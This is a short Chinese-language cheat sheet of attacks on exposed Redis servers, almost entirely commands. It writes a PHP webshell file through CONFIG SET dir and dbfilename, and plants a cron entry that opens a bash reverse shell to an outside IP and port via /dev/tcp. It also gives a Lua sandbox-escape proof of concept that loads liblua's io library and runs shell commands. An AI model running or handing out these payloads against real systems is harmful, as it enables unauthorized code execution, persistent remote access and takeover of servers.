config set dir /tmp ## 设置WEB写入目录 config set dbfilename 1.php ## 设置写入文件名 set test "<?php phpinfo();?>"## 设置写入文件代码 bgsave ## 保存执行 save ## 保存执行 注意:部分没目录权限读写权限
2、写定时任务反弹shell
利用条件: 允许异地登录 安全模式protected-mode处于关闭状态
config set dir /var/spool/cron set yy "\n\n\n* * * * * bash -i >& /dev/tcp/47.94.236.117/5555 0>&1\n\n\n" config set dbfilename x save
Poc:执行id命令 连接上Redis,执行: eval'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res'0